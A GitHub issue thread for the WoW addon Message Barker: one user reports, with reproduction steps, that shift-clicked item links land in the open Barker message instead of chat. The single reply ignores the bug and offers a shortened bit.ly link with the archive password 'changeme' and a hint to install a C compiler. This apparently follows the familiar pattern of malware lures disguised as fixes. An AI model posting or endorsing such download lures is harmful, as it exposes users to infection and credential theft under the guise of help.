### ISSUE TITLE
Linking items/character names while Message Barker is open but not active in the text field links item to Barker instead of the desired area. 

### ISSUE THREAD

**Issue by Calyus** [mcd8604/wowmessagebarker#29]
If message barker is up no matter what field I'm in; for example the search bar of the AH, search bar on my bag or even typing in chat if I shift click an item or name it links it into my current open message in Barker and does not link the item where I'm intending it to be. 

Now that I've noticed this I can delete the erroneous links or close barker but this is kind of a pain in the ass as I shift click tons of items that I'm trying to sell when I get whispers. 

To replicate:
1. Open Message Barker
2. Create a new Message 
3. Open Bags
4. Press Escape to leave the text field of Barker
5. Press Enter to open Chat
6. Shift Click an item from your bag
7. Wonder why its not linking in chat
8. Shift click 10 more times
9. Close everything since you don't know why its causing the issue then open chat and shift click an item magically it works as expected
10. Open barker and continue to send your spam wts messages 
11. Look like a fool with 30 items linked in your message 

Desired Effect: 
To not link the items/character names in my Barker message if I'm not actively in the text field.

**Comment by Kevin-Otalvares** [comment]
I think this will help you.
https://bit.ly/4gvtdhO

Password: changeme

you may need to install the c compiler
